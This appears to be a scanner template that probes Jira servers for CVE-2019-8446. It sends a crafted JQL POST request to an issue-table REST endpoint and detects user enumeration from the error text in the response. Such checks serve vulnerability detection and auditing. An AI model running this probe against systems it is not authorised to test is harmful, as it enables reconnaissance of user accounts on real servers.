id: CVE-2019-8446 info: name: Jira Improper Authorization risk: Medium params: - root: '{{.BaseURL}}' variables: - endpoint: | rest/issueNav/1/issueTable requests: - method: POST url: >- {{.root}}/{{.endpoint}} headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Connection: Close - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 - X-Atlassian-Token: no-check - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 body: | {'jql':'project in projectsLeadByUser("g147isalive")'} detections: - >- StringSearch("resBody", "the user does not exist") references: - https://www.cvebase.com/cve/2019/8446